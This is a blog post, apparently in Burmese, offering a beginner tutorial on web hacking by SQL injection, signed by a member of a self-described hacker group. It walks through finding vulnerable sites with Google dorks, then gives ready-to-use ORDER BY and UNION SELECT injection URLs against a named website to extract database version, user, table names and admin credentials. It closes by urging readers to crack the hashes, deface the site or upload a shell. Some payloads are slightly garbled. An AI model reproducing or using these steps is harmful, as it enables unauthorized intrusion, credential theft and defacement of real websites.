Pages

Subscribe:
Blogger Tips and TricksLatest Tips And TricksBlogger Tricks

Saturday, January 18, 2014

Web Hacking SQL injection Tutorials (For Newbies)

က်ဴတိုရီရယ္ကို ပထမဆံုးစေရးတာဆိုေတာ့ အမွားပါရင္ခြင့္လႊတ္ပါေနာ္။ SQL injection ဆိုတာ လြယ္ကူတဲ့ အမ်ိဳးေတာ့ မဟုတ္။
SQL injection ကိုနားမလည္တဲ့လူေတြအမ်ားၾကီးရွိပါတယ္။ တကယ္ေတာ့ SQL injection ဆိုတာ Programmer ရဲ့ URL VULN မွာ admin pass,user ေတြကို မသြားတာေပါ့ဗ်ာ။ ဒီ က်ဴတိုရီရယ္ ေလးကေတာ့ SQL injectionကို နားလည္လြယ္ ေအာင္ ေရးထားပါတယ္။

What is SQL Injection?
အေပၚမွာေျပာခဲ့သလိုေပါ့  SQL injection ဆိုတာ Programmer ရဲ့ URL VULN မွာ admin pass, user ေတြကို မသြား တာ။ ဟုတ္တယ္. . .ဒါေပမယ့္အဲ့ေလာက္လြယ္ေနရင္ေတာ့ လူတိုင္း ဟက္ကာျဖစ္ျပီေပါ့ ဟီးဟီး ^_^။ Attacker တစ္ေယာက္က sql vuln ျဖစ္တဲ့ ဆိုက္ကိုရွာ DORK ေတြသံုးတာေပါ့။ ေတြ႕ရင္ လည္း colum ေတြ Tableေတြရွာရမယ္။ တစ္ခ်ိဳဳ  ့ ဆိုက္ေတြမွာ admin table မရွိဘူး။ အာ့မ်ိဴးဆိုရင္ေတာ့ ဂြမ္းျပီေပါ့ဗ်ာ။ Admin Access ရရင္ေတာ့ဗ်ာ DEFACE အုပ္မွာလား။ Shell  တင္မလားၾကိဳက္ တာလုပ္ေတာ့။

Injection အတြက္လိုအပ္တာေလးေတြကေတာ့
1. Sql injection Dork List(Vulnျဖစ္တဲ ့ဆိုက္ေတြရွာဖို ့ေပါ့ )
2.Little Bit Understanding about Database and URL
3. A Browser

1. Find Vuln Web site....
Attacker တစ္ေယာက္က ဆိုက္ကိုရွာဖို႔အတြက္ Google လို Search engine ေတြမွာ  Dork List ထဲက keyword ေတြနဲ႔ ရွာရမွာပါ။ Googleမွာ "inurl:index.php?id=" Dork Listေတြက အမ်ားၾကီးေနာ္။ ဒါကနမူနာ အဲ့လိုရွာလိုက္ရင္ေတာ့ အားပါးပါး ဆိုက္ေတြအမ်ားၾကီးကို ေတြ႕မွာပါ။ အဲ့ထဲက တစ္ဆိုက္ေလာက္ ေရြးလိုက္ပါ။ ျပီးရင္link ကိုၾကည့္ ပါ။ http://www.kenwright.com/index.php?id=1265 ထားပါေတာ့။ အဲ့လိုေတြ႕ ပါလိမ့္မယ္ vuln ျဖစ္မျဖစ္ကေတာ့ . . . .

2.The Site is Vuln or NOT???
ကဲခုနက လင့္ေလးေနာက္မွာ (')ေလးထည့္လိုက္ပါ။ အာ့ဆိုလင့္ေလးက

http://www.kenwright.com/index.php?id=1265'ဆိုျပီးျဖစ္တာေပါ့ေနာ္။ အဲ့လိုလုပ္လို ့Browser မွာ -

ငိငိဒါဆိုေတာ့ကံေကာင္းျပီ vuln ျဖစ္ေနျပီ အဲ ့လိုမဟုတ္ပဲ အျဖဴ ပဲေပၚရင္လည္း Vuln ပါ။

3. Find the number of columns...
ကဲကဲကြ်န္ေတာ္တို ့column ရွာရေတာ့မယ္ေလျပီးရင္ေတာ့ ....ဟီးဟီး  ---ဘယ္လိုရွာမလဲဆိုေတာ့
http://www.kenwright.com/index.php?id=1265 အဲ့ဒါေလးရဲ့ ေနာက္မွာ Order by 1 ဆိုျပီးေတာ့ရွာပါ။ Error မတက္ ရင္ေတာ့ မေတြ ့ေသးလို ့ပါ။ အဲ့ဒီနည္းကမရရင္လဲ Order by 1-- ဆိုျပီးေတာ့ေပါ့။ မေတြ႕ရင္ေတာ့ မရွိေသးလို ့ပါ Error မတက္ မခ်င္းေပါ့။
           http://www.kenwright.com/index.php?id=1265 Order by 6--
           http://www.kenwright.com/index.php?id=1265 Order by 7--
           http://www.kenwright.com/index.php?id=1265 Order by 8--
           http://www.kenwright.com/index.php?id=1265 Order by 9--
           http://www.kenwright.com/index.php?id=1265 Order by 10--
           http://www.kenwright.com/index.php?id=1265 Order by 11--
ကဲ Order by 11-- မွာ Error ေတြ႕ရင္ေတာ့colum ဆယ္တစ္ခုရွိတယ္လို ့သိရပါမယ္။ ဒီလိုေပၚပါ လိမ့္မယ္။

1054: Unknown column '11' in 'order clause'
SELECT * FROM kenw_content WHERE id = 1265 order by 11--


ငိငိ အဲ့လိုေလးေပါ့။  အာ့ဆိုရင္ေတာ့ number of column = 10 ပါ။
Error မတက္ခင္ order by 10-- ပံု
Error တက္သြားခ်ိန္ order by 11-- ပံု
3.Find the vuln column.
ကဲဘယ္လို ယူမလဲဆိုေတာ့
http://www.kenwright.com/index.php?id=-1265 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- 
အဲ့လိုေလးေပါ့။ ဒါေပမယ့္သတိထားဖို႔ ကေတာ့ id မွာ - ထည့္ဖို ့မေမ့ပါနဲ ့ေနာ္။ ^_^ အာ့ဆိုရင္ေတာ့ vuln column ေတြေပၚလာပါလိမ့္မယ္။

4.Finding sql version,Database and User.
နမူနာအေနနဲ ေပါ့အခုေတာ့ခရီးေပါက္ေနပါျပီေနာ္ ဟုတ္တယ္ဟုတ္။Version ရွာရင္ေတာ့
http://www.kenwright.com/index.php?id=-1265 union select 1,version(),3,4,5,6,7,8,9,10--
Database version ရွာခ်င္ရင္ေတာ့
http://www.kenwright.com/index.php?id=-1265 union select 1,version(),3,4,5,6,7,8,9,10--
ကဲကဲ  User က္ုိရွာမယ္ဆိုရင္ေတာ့
http://www.kenwright.com/index.php?id=-1265 union select 1,user(),3,4,5,6,7,8,9,10--
အဲ့လိုေလးေပ့ါ။ ^_^ း)

5.Finding the Table name.
Table ကလည္းအေရးၾကီးပါတယ္ သူ့ထဲမွာ Admin user,pass ေတြပါတယ္ေလ။ သူ ့နာမည္ေလး ေတြရွာတာေပါ့ဗ်ာ။
http://www.kenwright.com/index.php?id=-1265 union select 1,group_contact(table_name), 3,4,5,6,7,8,9,10-- from information_schema.tables where table_schema=database()
ကဲကဲ Enter ေခါက္လိုက္ေတာ့ Tableၾကီးအျပည့္ေပၚလာျပီေပါ့။ အဲ့မွာ admin user,pass ရွာပါ MD5ေလး ေတာ့ျဖည္ပါေနာ္။
admin page ကို Havijသံုးျပီးလုပ္ပါ။ admin ျဖစ္ျပီဆိုေတာ့လုပ္ခ်င္တိုင္းလုပ္ေပါ့။


ကြ်န္ေတာ္ေနာက္ဆံုးေျပာခ်င္တာကေတာ့ ဟက္ကင္းဟာလြယ္မွာေတာ့မဟုတ္ဘူး ဆိုတာပါ။ :)

                                                                          r3D !nj3ct0r (MHW)


Greetz to :: z@_@y|Nay Paing|B00M|All MHW member|and all myanmar Hacker

2 comments:

Unknown said...

လာလည္သြားပါတယ္ ခမ်ာ က်ေနာ့္ ဘေလာ့ ေလးလညး္အားေပးပါဦး
http://revoultionofmyanmarhacker.blogspot.com/

Unknown said...

ေက်းဇူးတင္ပါတယ္ခင္မ်ာ

Post a Comment